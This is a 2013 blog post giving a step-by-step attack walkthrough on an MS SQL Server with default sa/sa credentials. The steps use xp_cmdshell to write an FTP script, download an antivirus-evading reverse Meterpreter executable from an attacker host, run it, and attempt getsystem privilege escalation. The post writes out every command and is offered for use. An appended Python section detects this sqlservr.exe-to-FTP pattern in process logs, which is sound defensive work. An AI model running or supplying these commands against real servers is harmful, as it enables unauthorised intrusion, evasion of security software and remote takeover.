Thursday, July 18, 2013

Unprivileged MS SQL Server Service and A/V to Meterpreter Shell

Hey! Long time no blog! I know it's been a long while, but here is a fun one that I came across recently that I'd like to share...

Let's say you were able to find an MS SQL Server instance that was using creds of sa/sa. You think to yourself, SWEET! This is easy! You then try to use the metasploit xp_cmdshell module and find that you can't create a new local user... ACCESS DENIED! Doh! Then you try to use the metasploit mssql_exec module to upload a payload... <cricket> <cricket>... nothing. You realize that MS SQL is running under an unprivileged account and the machine might also be running A/V. So what next? How can we pwn this thing?

Here is one method that you can use...
  1. Connect to the server using MS SQL Server Management Studio. I prefer this way over running the metasploit xp_cmdshell module since it is a lot easier to enter multiple commands. Next we want to get a shell on the system so that we can maneuver around the system more easily and attempt to escalate privileges. Since we can only execute one command at a time with xp_cmdshell, we need to find a one-line command that downloads a file. For this we can use the Windows built-in "ftp" command along with a script file.

  2. We will first set up an FTP server to host our file. We can use the metasploit "auxiliary/server/ftp" module for this purpose. Configure it with a username, a password, and a root directory. Start the module with "run" and it will automatically run as a background job.


  3. Next we will create a reverse meterpreter executable to bypass A/V and place it into the ftp root directory. I won't go into the specifics in this post as there are lots of resources out there. One of my favorite methods, which is also super easy to use, is detailed here: https://www.christophertruncer.com/bypass-antivirus-with-meterpreter-as-the-payload-hyperion-fun/

  4. We now need to set up a handler in metasploit to catch the reverse shell. For this we can use the "exploit/multi/handler" module. Configure the module to match the settings used in your reverse meterpreter executable created in the last step. Run the module with "exploit -j" to run it as a background job.


  5. We will then use the xp_cmdshell stored procedure to create a script file in a folder that the user has access to, typically "c:\windows\temp" is a good bet. The first two lines will send the username and password for the FTP server. The lines after that will set the transfer mode to binary, change directories locally to our c:\windows\temp folder, download the file, and then quit. In MS SQL Server Management Studio, open a new Query window and execute the following queries:

    exec xp_cmdshell 'echo ftpuser > c:\windows\temp\ftp.txt';
    exec xp_cmdshell 'echo ftppass >> c:\windows\temp\ftp.txt';
    exec xp_cmdshell 'echo binary >> c:\windows\temp\ftp.txt';
    exec xp_cmdshell 'echo lcd c:\windows\temp >> c:\windows\temp\ftp.txt';
    exec xp_cmdshell 'echo get file.exe >> c:\windows\temp\ftp.txt';
    exec xp_cmdshell 'echo quit >> c:\windows\temp\ftp.txt'; 


  6. Now you want to ensure that the ftp.txt file is complete by executing the following query:

    exec xp_cmdshell 'type c:\windows\temp\ftp.txt';

  7. We will now use the "ftp" command to download the file by executing the following query, replacing the IP address with your FTP server's IP address:

    exec xp_cmdshell 'ftp -s:c:\windows\temp\ftp.txt 10.0.0.2';

  8. Let's verify that the file has downloaded into our temp directory and hasn't been detected and killed by A/V by executing the following query:

    exec xp_cmdshell 'dir c:\windows\temp';

  9. Now that everything is set up and ready to go, we can finally execute the reverse meterpreter file and wait for a connection in metasploit by executing the following query:

    exec xp_cmdshell 'c:\windows\temp\file.exe';

  10. Once you have your established meterpreter session, you can do all the usual things. Since the MS SQL Server account is an unprivileged user, we can attempt to escalate privileges by using the command "getsystem". If that works, then you are golden! Have fun and enjoy!!
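
Seen from the defending side, the steps above leave a distinctive process trail, because xp_cmdshell runs each command as a cmd.exe child of sqlservr.exe. The following Python check is an added example, not part of the original post: it correlates process-creation records per host and alerts when a file written with echo is later handed to "ftp -s:". The record layout, host names and sqlservr.exe path are constructed sample data.

```python
import re
from collections import defaultdict

# Constructed process-creation records (host, parent image, command line),
# shaped like Sysmon Event ID 1 / Security 4688 fields. Not real logs.
SQL = r"C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe"
EVENTS = [
    ("db01", SQL, r"cmd.exe /c echo ftpuser > c:\windows\temp\ftp.txt"),
    ("db01", SQL, r"cmd.exe /c echo get file.exe >> c:\windows\temp\ftp.txt"),
    ("db01", SQL, r"cmd.exe /c ftp -s:c:\windows\temp\ftp.txt 10.0.0.2"),
    ("db01", SQL, r"cmd.exe /c c:\windows\temp\file.exe"),
    ("db02", SQL, r"cmd.exe /c dir d:\backups"),
    ("ws07", r"C:\Windows\explorer.exe", r"cmd.exe /c ftp -s:c:\scripts\nightly.txt 10.0.0.9"),
]

# Each rule captures the file it refers to in the named group "path".
RULES = {
    "script_write": re.compile(r"\becho\b.*>{1,2}\s*(?P<path>\S+)", re.I),
    "scripted_ftp": re.compile(r"\bftp(?:\.exe)?\s.*?-s:(?P<path>\S+)", re.I),
    "temp_exec": re.compile(r'/c\s+"?(?P<path>[a-z]:\\\S*temp\\\S+\.exe)', re.I),
}

def detect(events):
    """Return {host: evidence} where SQL Server staged and ran an FTP script."""
    seen = defaultdict(lambda: defaultdict(set))
    for host, parent, cmd in events:
        # Only commands whose parent is the SQL Server service are of interest.
        if not parent.lower().endswith(r"\sqlservr.exe"):
            continue
        for stage, rx in RULES.items():
            m = rx.search(cmd)
            if m:
                seen[host][stage].add(m.group("path").lower())
    alerts = {}
    for host, stages in seen.items():
        # High confidence: the file built with echo is the one passed to ftp -s:
        linked = stages["script_write"] & stages["scripted_ftp"]
        if linked:
            alerts[host] = {"script": sorted(linked),
                            "executed": sorted(stages["temp_exec"])}
    return alerts

if __name__ == "__main__":
    print(detect(EVENTS))
```

On its own, any cmd.exe child of sqlservr.exe is worth reviewing on servers where xp_cmdshell has no business use; the correlation here just raises confidence and names the files to collect.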